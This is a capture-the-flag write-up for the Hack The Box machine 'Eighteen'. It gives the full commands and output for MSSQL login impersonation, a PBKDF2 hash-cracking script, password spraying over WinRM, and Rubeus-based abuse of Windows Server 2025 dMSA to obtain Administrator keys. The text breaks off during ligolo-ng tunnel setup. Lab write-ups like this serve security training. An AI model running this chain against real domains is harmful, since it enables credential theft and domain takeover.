Hackthebox: Eighteen

Overview

Eighteen is an easy-difficulty windows machine running a Domain Controller (DC01). We start with MSSQL credentials found during enumeration, pivot through the database to extract a web application admin hash, crack it, and spray the password across domain users to land a WinRM shell. From there, we abuse the Delegated Managed Service Account (dMSA) feature introduced in Windows Server 2025 to impersonate the Administrator and perform a DCSync, fully compromising the domain.

Reconnaissance

We begin with a full port scan using nmap:

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
|   10.129.116.222:1433:
|     Target_Name: EIGHTEEN
|     NetBIOS_Domain_Name: EIGHTEEN
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: eighteen.htb
|     DNS_Computer_Name: DC01.eighteen.htb
|     DNS_Tree_Name: eighteen.htb
|_    Product_Version: 10.0.26100
| ms-sql-info:
|   10.129.116.222:1433:
|     Version:
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2025-11-19T10:36:21+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-19T03:21:40
|_Not valid after:  2055-11-19T03:21:40
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   456.07 ms 10.10.16.1
2   456.19 ms 10.129.116.222

We have three open ports: HTTP (80), MSSQL (1433), and WinRM (5985). The HTTP redirects to eighteen.htb, so we add it to /etc/hosts. The NTLM info reveals this is DC01.eighteen.htb — a Domain Controller running Windows Server 2025.

MSSQL Enumeration

We have credentials kevin / iNa2we6haRj2gaw! for the MSSQL service. We connect using impacket-mssqlclient:

$ impacket-mssqlclient eighteen.htb/kevin:'iNa2we6haRj2gaw!'@10.129.116.222
Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (kevin  guest@master)> enum_logins
name     type_desc   is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin
------   ---------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------
sa       SQL_LOGIN             0          1               0             0            0              0           0           0           0
kevin    SQL_LOGIN             0          0               0             0            0              0           0           0           0
appdev   SQL_LOGIN             0          0               0             0            0              0           0           0           0
SQL (kevin  guest@master)> exec_login as appdev
ERROR(DC01): Line 1: Incorrect syntax near the keyword 'as'.
SQL (kevin  guest@master)> exec_as_login appdev
SQL (appdev  appdev@master)> enum_db
name                is_trustworthy_on
-----------------   -----------------
master                              0
tempdb                              0
model                               0
msdb                                1
financial_planner                   0
SQL (appdev  appdev@master)> use financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev  appdev@financial_planner)> select name from sys.tables;
name
-----------
users
incomes
expenses
allocations
analytics
visits
SQL (appdev  appdev@financial_planner)> select * from users;
  id   full_name   username   email                password_hash                                                                                            is_admin   created_at
----   ---------   --------   ------------------   ------------------------------------------------------------------------------------------------------   --------   ----------
1002   admin       admin      [email protected]   pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133          1   2025-10-29 05:39:03
SQL (appdev  appdev@financial_planner)>

We enumerate the SQL logins and find an appdev account. Using exec_as_login, we impersonate appdev and discover a financial_planner database containing a users table. We extract the admin password hash — a pbkdf2:sha256 hash with 600,000 iterations.

Cracking the Hash

The hash format is Werkzeug’s PBKDF2, commonly used in Flask applications. We write a quick Python cracker:

$ cat cracker.py
import sys
import hashlib
from tqdm import tqdm

if len(sys.argv) != 2:
    print(f"Usage: {sys.argv[0]} <wordlist>")
    sys.exit(1)

wordlist_path = sys.argv[1]

hash_string = input("Enter hash (pbkdf2:sha256:ITER$SALT$HEX): ").strip()

try:
    method_part, salt_str, hash_hex = hash_string.split("$")
    algo, digest, iterations_str = method_part.split(":")
    iterations = int(iterations_str)
except ValueError:
    print("[!] Hash format looks wrong. Expected: pbkdf2:sha256:ITERATIONS$SALT$HEX_HASH")
    sys.exit(1)

salt = salt_str.encode()
target_hash = bytes.fromhex(hash_hex)

with open(wordlist_path, "r", encoding="utf-8", errors="ignore") as f:
    passwords = f.read().splitlines()

print(f"[+] Loaded {len(passwords)} passwords from {wordlist_path}")
print("[+] Cracking...")

found = False

for pwd in tqdm(passwords, unit="pwds"):
    derived = hashlib.pbkdf2_hmac(
        "sha256",
        pwd.encode(),
        salt,
        iterations
    )
    if derived == target_hash:
        print(f"\n[+] Password found: {pwd}")
        found = True
        break

if not found:
    print("\n[-] Password not found in wordlist.")





$ python3 cracker.py /usr/share/wordlists/rockyou.txt
Enter hash (pbkdf2:sha256:ITER$SALT$HEX): pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133
[+] Loaded 14344392 passwords from /usr/share/wordlists/rockyou.txt
[+] Cracking...
  0%|                                                                                                                   | 232/14344392 [00:22<384:20:08, 10.37pwds/s]
[+] Password found: iloveyou1
  0%|

We crack the hash and recover the password: iloveyou1. We can now log in to the web application at http://eighteen.htb/dashboard with admin:iloveyou1.

Domain User Enumeration

Using the MSSQL access, we perform RID brute-forcing with netexec to enumerate domain users:

$ nxc  mssql 10.129.116.222 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute
MSSQL       10.129.116.222  1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL       10.129.116.222  1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL       10.129.116.222  1433   DC01             498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL       10.129.116.222  1433   DC01             500: EIGHTEEN\Administrator
MSSQL       10.129.116.222  1433   DC01             501: EIGHTEEN\Guest
MSSQL       10.129.116.222  1433   DC01             502: EIGHTEEN\krbtgt
MSSQL       10.129.116.222  1433   DC01             512: EIGHTEEN\Domain Admins
MSSQL       10.129.116.222  1433   DC01             513: EIGHTEEN\Domain Users
MSSQL       10.129.116.222  1433   DC01             514: EIGHTEEN\Domain Guests
MSSQL       10.129.116.222  1433   DC01             515: EIGHTEEN\Domain Computers
MSSQL       10.129.116.222  1433   DC01             516: EIGHTEEN\Domain Controllers
MSSQL       10.129.116.222  1433   DC01             517: EIGHTEEN\Cert Publishers
MSSQL       10.129.116.222  1433   DC01             518: EIGHTEEN\Schema Admins
MSSQL       10.129.116.222  1433   DC01             519: EIGHTEEN\Enterprise Admins
MSSQL       10.129.116.222  1433   DC01             520: EIGHTEEN\Group Policy Creator Owners
MSSQL       10.129.116.222  1433   DC01             521: EIGHTEEN\Read-only Domain Controllers
MSSQL       10.129.116.222  1433   DC01             522: EIGHTEEN\Cloneable Domain Controllers
MSSQL       10.129.116.222  1433   DC01             525: EIGHTEEN\Protected Users
MSSQL       10.129.116.222  1433   DC01             526: EIGHTEEN\Key Admins
MSSQL       10.129.116.222  1433   DC01             527: EIGHTEEN\Enterprise Key Admins
MSSQL       10.129.116.222  1433   DC01             528: EIGHTEEN\Forest Trust Accounts
MSSQL       10.129.116.222  1433   DC01             529: EIGHTEEN\External Trust Accounts
MSSQL       10.129.116.222  1433   DC01             553: EIGHTEEN\RAS and IAS Servers
MSSQL       10.129.116.222  1433   DC01             571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL       10.129.116.222  1433   DC01             572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL       10.129.116.222  1433   DC01             1000: EIGHTEEN\DC01$
MSSQL       10.129.116.222  1433   DC01             1101: EIGHTEEN\DnsAdmins
MSSQL       10.129.116.222  1433   DC01             1102: EIGHTEEN\DnsUpdateProxy
MSSQL       10.129.116.222  1433   DC01             1601: EIGHTEEN\mssqlsvc
MSSQL       10.129.116.222  1433   DC01             1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL       10.129.116.222  1433   DC01             1603: EIGHTEEN\HR
MSSQL       10.129.116.222  1433   DC01             1604: EIGHTEEN\IT
MSSQL       10.129.116.222  1433   DC01             1605: EIGHTEEN\Finance
MSSQL       10.129.116.222  1433   DC01             1606: EIGHTEEN\jamie.dunn
MSSQL       10.129.116.222  1433   DC01             1607: EIGHTEEN\jane.smith
MSSQL       10.129.116.222  1433   DC01             1608: EIGHTEEN\alice.jones
MSSQL       10.129.116.222  1433   DC01             1609: EIGHTEEN\adam.scott
MSSQL       10.129.116.222  1433   DC01             1610: EIGHTEEN\bob.brown
MSSQL       10.129.116.222  1433   DC01             1611: EIGHTEEN\carol.white
MSSQL       10.129.116.222  1433   DC01             1612: EIGHTEEN\dave.green

We now have a list of domain users. Let’s spray the cracked password iloveyou1 across them via WinRM.

User Flag - Password Spraying

We spray the password against all discovered domain users over WinRM:

$ nxc  winrm 10.129.116.222 -u users -p 'iloveyou1'
WINRM       10.129.116.222  5985   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM       10.129.116.222  5985   DC01             [-] eighteen.htb\jamie.dunn:iloveyou1
WINRM       10.129.116.222  5985   DC01             [-] eighteen.htb\jane.smith:iloveyou1
WINRM       10.129.116.222  5985   DC01             [-] eighteen.htb\alice.jones:iloveyou1
WINRM       10.129.116.222  5985   DC01             [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)

[+] We get a hit on adam.scott:iloveyou1. We connect using evil-winrm and grab the user flag:

$ evil-winrm -i 10.129.116.222 -u adam.scott -p iloveyou1

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.scott\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\adam.scott\desktop> cat user.txt
d6d73b2bfe99ca5ceaf483e446443f74
*Evil-WinRM* PS C:\Users\adam.scott\desktop>

Privilege Escalation - dMSA Abuse

Windows Server 2025 introduces Delegated Managed Service Accounts (dMSA), a new account type designed to replace legacy service accounts. The key feature we abuse here is the msDS-ManagedAccountPrecededByLink attribute — when a dMSA “supersedes” another account, the KDC grants it all the privileges of the preceded account, including its keys.

Since adam.scott has the ability to create dMSA objects in the OU=Staff organizational unit, we can:

Create a new dMSA
Set its msDS-ManagedAccountPrecededByLink to point to the Administrator account
Set msDS-DelegatedMSAState to 2 (indicating migration is complete)
Request a TGT as the dMSA, which will carry the Administrator’s keys

First, we create the dMSA and configure the ACLs:

*Evil-WinRM* PS C:\Users\adam.scott\Documents> New-ADServiceAccount -Name "testdmsa" `
    -DNSHostName "testdmsa.eighteen.htb" `
    -CreateDelegatedServiceAccount `
    -KerberosEncryptionType AES256 `
    -PrincipalsAllowedToRetrieveManagedPassword "adam.scott" `
    -Path "OU=Staff,DC=eighteen,DC=htb"
*Evil-WinRM* PS C:\Users\adam.scott\Documents> $sid = (Get-ADUser -Identity "adam.scott").SID
$acl = Get-Acl "AD:\CN=testdmsa,OU=Staff,DC=eighteen,DC=htb"
$rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($sid,"GenericAll","Allow")
$acl.AddAccessRule($rule)
Set-Acl -Path "AD:\CN=testdmsa,OU=Staff,DC=eighteen,DC=htb" -AclObject $acl
*Evil-WinRM* PS C:\Users\adam.scott\Documents> Set-ADServiceAccount -Identity testdmsa -Replace @{
    'msDS-ManagedAccountPrecededByLink'='CN=Administrator,CN=Users,DC=eighteen,DC=htb';
    'msDS-DelegatedMSAState'=2
}

Next, we upload Rubeus and compute the AES256 key for adam.scott, then request a TGT:

*Evil-WinRM* PS C:\Users\adam.scott\Documents> upload rubeus1.exe

Info: Uploading /home/kali/Desktop/Tools (2)/rubeus1.exe to C:\Users\adam.scott\Documents\rubeus1.exe

Data: 632832 bytes of 632832 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\adam.scott\Documents> mv rubeus1.exe Rubeus.exe
*Evil-WinRM* PS C:\Users\adam.scott\Documents> ./Rubeus.exe hash /password:'iloveyou1' /user:adam.scott /domain:eighteen.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3


[*] Action: Calculate Password Hash(es)

[*] Input password             : iloveyou1
[*] Input username             : adam.scott
[*] Input domain               : eighteen.htb
[*] Salt                       : EIGHTEEN.HTBadam.scott
[*]       rc4_hmac             : 9964DAE494A77414E34AFF4F34412166
[*]       aes128_cts_hmac_sha1 : 041716887B5EFBA3BA1DCDDAD9BBE98E
[*]       aes256_cts_hmac_sha1 : 02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5
[*]       des_cbc_md5          : 9DCD08CB79833D58

*Evil-WinRM* PS C:\Users\adam.scott\Documents> ./Rubeus.exe asktgt /user:adam.scott /aes256:02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5 /domain:eighteen.htb /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Ask TGT

[*] Using aes256_cts_hmac_sha1 hash: 02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5
[*] Building AS-REQ (w/ preauth) for: 'eighteen.htb\adam.scott'
[*] Using domain controller: fe80::1a5e:1ffe:1b5d:e732%3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFpjCCBaKgAwIBBaEDAgEWooIEqTCCBKVhggShMIIEnaADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEYTCCBF2gAwIBEqEDAgECooIETwSCBEsw+u+xS26gdiXbpbFgTotyUQazQBd6ABbxjGK8InytxS8Y9yXj96Za1OwpyvgY59Uwvjy4zBKNZq6y7JXV8z8RgRvrNOqCTSBBNv//2NXtp5r+D5K01lDF8XMFVtrtYg0r6bKGPzxA9YrJSRe3NoCpCOyyxz2cgqteLwZxHdKvCuBzV5Oh57Gqob295yAaQrlJJvqWwgAOM5o57AXe6Y1NpCNSRMTqtul3f4T0H7RABoMc6bsNcj1rMc0F80FuPLkeLaSin+S3PZSL/8YgcILpNCRGHMn7czpN5Ychk046JwhIvIJDM2PeB2bJyiAVtTJl37Gnz536JyfBaMPjhem0eQLLh/7H5Ly3UOuGuHmTtR4ME6H1GfjIR7/fGJ0OUu80RQko7jWGCNH5F++tqUj+ws3lPJi82SByJVpSLyKZd9cy+6ISvUlY+wteIY3wES9vy5v3Q3B02uLN4vZ1Rn10ZgoiWuA5qzUghowFm0VHQd+tR9PPAS85YsHX2opqJ5TljBS295M7hPGXbLI4HGbmwl0F7lpG1EioszardVIsEPbSRhv37DRcKt8sqGhXePfd5avltJ9K2VstpH2n9OIsuQ0oxh0Rzbf3/TfLvIlCoTRG78LdaPndl/w/bYrSj+aKPYCX3p3V9IO0Lrwo8mDsTlKp+NIJA6edYyk+8h9CvRqpZNVWmuTZMhuCEhNy3+1qnGAeYLXMuHDvGFNdDaYxkoUrYUpbe/JmWT5s5TsCSgSAns0og8oExhXFpLMmtrqPhvNZr+F4LZUS0a1YxakIMKbwmTQ8s3Bpk1wnHIpi7BPMq1vfTV85zHIbyXDIinHhuoIT5xfqGtf3tF6Hu0BvI1gP37nsisSSY5HWg7fLiET3Hdf06lUy8Bahhsk2vf4HXzOx/7CRFoBcT8LggIMGiuk8JWSwkiGb9VWOcWFpYw3jpwBioJBRzR7Le648LSSUCleBLgexTakbPs/+Oh1CBUWp5VxyGF7qOpgdW3Nvl9ajKjTiXpA6cn75+kMKxc+lsowaos9Gx49KmN/uBsHpgWRfkX/7S3NXhyh7rFFgFB9FYmgN2IAxMJR13e/Zpe1mc926ZQydvDuIKXvYt3GAYYaVk92NimmnrT6ika4cnxQ20SpPVOsL04DblgYX02tL4/ZRT5AhtELAzNpZOUVzY26SciwLtLl3XyBsfeBaTWh3lMaWvtrIrhFqPjsk3yW/yp74s+j/AAh9vcbGCDvKgK0yiwEZIhU7RdJD7x3eQZZFWAS00ulEgmb4Z3BmNep1qhKPK2lGCnglxoxJdN9iFfcy2UXUJufMQ2D90e6pHSpofHmJc2SOs04tTynWpYuIVPH13WyeG5RYf8nOCWuwzjfXnIwkJjp3KoN0ouv4GOk+s2bLDfnw0hzd32/Wlg1b2LS+AGYzgYjwAyrdlVyB2XfoIHDXfKJjBLvOp7oUAdpOsJBbWud+E9dpo4HoMIHloAMCAQCigd0Egdp9gdcwgdSggdEwgc4wgcugKzApoAMCARKhIgQgfW5N5UjEp1VTzTCh29CeaExi2BUrlwJtVKDiYdMzFAmhDhsMRUlHSFRFRU4uSFRCohcwFaADAgEBoQ4wDBsKYWRhbS5zY290dKMHAwUAQOEAAKURGA8yMDI1MTExOTE1MDIyNFqmERgPMjAyNTExMjAwMTAyMjRapxEYDzIwMjUxMTI2MTUwMjI0WqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDGVpZ2h0ZWVuLmh0Yg==

  ServiceName              :  krbtgt/eighteen.htb
  ServiceRealm             :  EIGHTEEN.HTB
  UserName                 :  adam.scott (NT_PRINCIPAL)
  UserRealm                :  EIGHTEEN.HTB
  StartTime                :  11/19/2025 7:02:24 AM
  EndTime                  :  11/19/2025 5:02:24 PM
  RenewTill                :  11/26/2025 7:02:24 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  fW5N5UjEp1VTzTCh29CeaExi2BUrlwJtVKDiYdMzFAk=
  ASREP (key)              :  02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5

Now we use the /dmsa flag in Rubeus to request a TGS as testdmsa$, which will inherit the Administrator’s credentials:

*Evil-WinRM* PS C:\Users\adam.scott\Documents> ./Rubeus.exe asktgs /targetuser:testdmsa$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap  /ticket:doIFpjCCBaKgAwIBBaEDAgEWooIEqTCCBKVhggShMIIEnaADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEYTCCBF2gAwIBEqEDAgECooIETwSCBEsw+u+xS26gdiXbpbFgTotyUQazQBd6ABbxjGK8InytxS8Y9yXj96Za1OwpyvgY59Uwvjy4zBKNZq6y7JXV8z8RgRvrNOqCTSBBNv//2NXtp5r+D5K01lDF8XMFVtrtYg0r6bKGPzxA9YrJSRe3NoCpCOyyxz2cgqteLwZxHdKvCuBzV5Oh57Gqob295yAaQrlJJvqWwgAOM5o57AXe6Y1NpCNSRMTqtul3f4T0H7RABoMc6bsNcj1rMc0F80FuPLkeLaSin+S3PZSL/8YgcILpNCRGHMn7czpN5Ychk046JwhIvIJDM2PeB2bJyiAVtTJl37Gnz536JyfBaMPjhem0eQLLh/7H5Ly3UOuGuHmTtR4ME6H1GfjIR7/fGJ0OUu80RQko7jWGCNH5F++tqUj+ws3lPJi82SByJVpSLyKZd9cy+6ISvUlY+wteIY3wES9vy5v3Q3B02uLN4vZ1Rn10ZgoiWuA5qzUghowFm0VHQd+tR9PPAS85YsHX2opqJ5TljBS295M7hPGXbLI4HGbmwl0F7lpG1EioszardVIsEPbSRhv37DRcKt8sqGhXePfd5avltJ9K2VstpH2n9OIsuQ0oxh0Rzbf3/TfLvIlCoTRG78LdaPndl/w/bYrSj+aKPYCX3p3V9IO0Lrwo8mDsTlKp+NIJA6edYyk+8h9CvRqpZNVWmuTZMhuCEhNy3+1qnGAeYLXMuHDvGFNdDaYxkoUrYUpbe/JmWT5s5TsCSgSAns0og8oExhXFpLMmtrqPhvNZr+F4LZUS0a1YxakIMKbwmTQ8s3Bpk1wnHIpi7BPMq1vfTV85zHIbyXDIinHhuoIT5xfqGtf3tF6Hu0BvI1gP37nsisSSY5HWg7fLiET3Hdf06lUy8Bahhsk2vf4HXzOx/7CRFoBcT8LggIMGiuk8JWSwkiGb9VWOcWFpYw3jpwBioJBRzR7Le648LSSUCleBLgexTakbPs/+Oh1CBUWp5VxyGF7qOpgdW3Nvl9ajKjTiXpA6cn75+kMKxc+lsowaos9Gx49KmN/uBsHpgWRfkX/7S3NXhyh7rFFgFB9FYmgN2IAxMJR13e/Zpe1mc926ZQydvDuIKXvYt3GAYYaVk92NimmnrT6ika4cnxQ20SpPVOsL04DblgYX02tL4/ZRT5AhtELAzNpZOUVzY26SciwLtLl3XyBsfeBaTWh3lMaWvtrIrhFqPjsk3yW/yp74s+j/AAh9vcbGCDvKgK0yiwEZIhU7RdJD7x3eQZZFWAS00ulEgmb4Z3BmNep1qhKPK2lGCnglxoxJdN9iFfcy2UXUJufMQ2D90e6pHSpofHmJc2SOs04tTynWpYuIVPH13WyeG5RYf8nOCWuwzjfXnIwkJjp3KoN0ouv4GOk+s2bLDfnw0hzd32/Wlg1b2LS+AGYzgYjwAyrdlVyB2XfoIHDXfKJjBLvOp7oUAdpOsJBbWud+E9dpo4HoMIHloAMCAQCigd0Egdp9gdcwgdSggdEwgc4wgcugKzApoAMCARKhIgQgfW5N5UjEp1VTzTCh29CeaExi2BUrlwJtVKDiYdMzFAmhDhsMRUlHSFRFRU4uSFRCohcwFaADAgEBoQ4wDBsKYWRhbS5zY290dKMHAwUAQOEAAKURGA8yMDI1MTExOTE1MDIyNFqmERgPMjAyNTExMjAwMTAyMjRapxEYDzIwMjUxMTI2MTUwMjI0WqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDGVpZ2h0ZWVuLmh0Yg==

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building DMSA TGS-REQ request for 'testdmsa$' from 'adam.scott'
[+] Sequence number is: 461317186
[*] Using domain controller: DC01.eighteen.htb (fe80::1a5e:1ffe:1b5d:e732%3)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

      doIFzDCCBcigAwIBBaEDAgEWooIE0DCCBMxhggTIMIIExKADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRCo4IEiDCCBISgAwIBEqEDAgECooIEdgSCBHL2XYiAW9sLcli+ZT49qHoVwybVwYG+jhDaWsvA3pYlenCk1peCPt6mvy2CmkbcH0jYaeYtat0Dr51cF5I4Nhcc9Gy5I8d/WpyZXQ3X5VdKCVtayviSBJ3+B8IjyVLyJAuihM/PKvSmI9qAbT/fd5K3IDHm76jH69QXKD8nyR7e5yNJ1QuksML8hrZ54tmPLHr5jlacPJ6zo/OAMeeWZwAE+1DRkHTO49TgOPZ8rRAiQ2WDG+ZTXpbsQK5vyF5BkqhxDyNtBnECprxXyf1ooeHgkhKrpM9z8zp8gIyk1aCti9phj5wGxUE2f9n8bAxejJZnqsMNrwJI6XwkShfME9dN7nTVJp9fMmvN6lTnv3RFxwmnNgSHU9l9Imud+NCYkHg49cqvVYQmanwjlVIvDDtvrqk1yChEaMBdAA3JHQhEoTCNM2KHLFqA7IbTE0Q5AdB8SdDeyLxP9i+2TSLNKH6WCE9BDTuh/VLVNt2vTlyEAIouZD4mR/vxa/Vtgc7Q8vRHWxA5abFtn6vW8TEoLzrhcup/bDMP4G9KLpB0UUKkeeYBoiS/782hUElcNo+BvwqVVhVzi7PBVAa0h2+z4VJd+tXimeaZOIK1rmfF1CNHUBo/qEZY0huKPXiDpppxeYjIzJIs8IzOR1Gvcm476Oz72wBmYq/JmDG1YLTlV6TCJqtiXGdGCbS/vG2lbZ/pxUq6cd45jhkggbL1kKcGBacqUa9o67qglALLBLcN4AYXXArBFwUxtdZwO32cgFeoQQtUUFH2kR6rDw4TIs9FhLwdTiPr5bmd90qtLW95HXyqzdS3P+6KJ95vNyLvLp/nHSV3mtj+ZsOnoZGSsamjSImWCSvjpklsbt7hkrqubB2CBBBo91ryyQgqvCVTyIxWgmAeC18ZmJz2RXrFc2pc3tD92LdKUwucccnRlm86H71/qqhPD4xgyVhAZLfvLu3yyz1jwMAQz8+odexz4CYrZ3HJ2ZbfXFT0OTgpHG5Hs3SyKSjGPSEyx0e0iXweV57Vf5mHI/Lo9xs+agV/GwGDHMVuLTpL1cb8KhT2rCUBeU/sKjXBtiKaecQDGlDjdfsanAN6nIXVg/K5bYM/oIKOGOv7LFOH/FALQyzzrk+ZNGrtg2zHlPjAYQUvnaD/hUn0iDX1gV1z38K840Pd1i9b0eOlAo3+FBmgvgWyoNEJjJ3yytb6Hf/ZXUlMAjqNbXtp0T3UtaNRp3WDYo8vTYqS9msZnQrs2b0/sp4kISPh19QJJoUabPSNfnUTz9RBXpfajp/kzFqWr9w13Yy17uQ8nCeZoAnqQR+JxUriNsIDcr1g6ElEG/p5dEhMFXw9Dm2gokTz5axr0ce8HcrHR2DOynLd6EDumV91CBHL9ZTAegiYm4fwCAYrE/FGK9hHbSHMTuqCgra+UevYc0HkSwY7OA8K2yn94opUtgj4DHIE7KD7L6nA8ewyVZJd5TINcI0nwBAsl6VXwzV13JOOxLlkMtFddi7gy2XywFRUoOZo6vLC5qzTo4HnMIHkoAMCAQCigdwEgdl9gdYwgdOggdAwgc0wgcqgKzApoAMCARKhIgQguYmVOMdoavbs5aAbzgK/8hyY6nEAfGfUra/HWDmKgpKhDhsMZWlnaHRlZW4uaHRiohYwFKADAgEBoQ0wCxsJdGVzdGRtc2EkowcDBQBAoQAApREYDzIwMjUxMTE5MTUwMjM4WqYRGA8yMDI1MTExOTE1MTczOFqnERgPMjAyNTExMjYxNTAyMjRaqA4bDEVJR0hURUVOLkhUQqkhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRC

  ServiceName              :  krbtgt/EIGHTEEN.HTB
  ServiceRealm             :  EIGHTEEN.HTB
  UserName                 :  testdmsa$ (NT_PRINCIPAL)
  UserRealm                :  eighteen.htb
  StartTime                :  11/19/2025 7:02:38 AM
  EndTime                  :  11/19/2025 7:17:38 AM
  RenewTill                :  11/26/2025 7:02:24 AM
  Flags                    :  name_canonicalize, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  uYmVOMdoavbs5aAbzgK/8hyY6nEAfGfUra/HWDmKgpI=
  Current Keys for testdmsa$: (aes256_cts_hmac_sha1) BB89D70E8C37CD6EE283DC4C7F9356BFE256D1DA23DCDCAE221B7A88D0CD1DC8


*Evil-WinRM* PS C:\Users\adam.scott\Documents> klist

Current LogonId is 0:0x196093

Cached Tickets: (1)

#0>     Client: testdmsa$ @ eighteen.htb
        Server: krbtgt/EIGHTEEN.HTB @ EIGHTEEN.HTB
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 11/19/2025 7:02:38 (local)
        End Time:   11/19/2025 7:17:38 (local)
        Renew Time: 11/26/2025 7:02:24 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

The ticket is now cached. We have a TGT for testdmsa$ that carries the Administrator’s keys.

Tunneling with Ligolo-ng

To use the ticket from our attacking machine, we set up a tunnel using ligolo-ng:

┌──(kali㉿kali)-[~/Downloads/ligolo-ng_proxy_0.8.2_linux_amd64]
└─$ sudo ip tuntap add user kali mode tun ligolo
[sudo] password for kali:

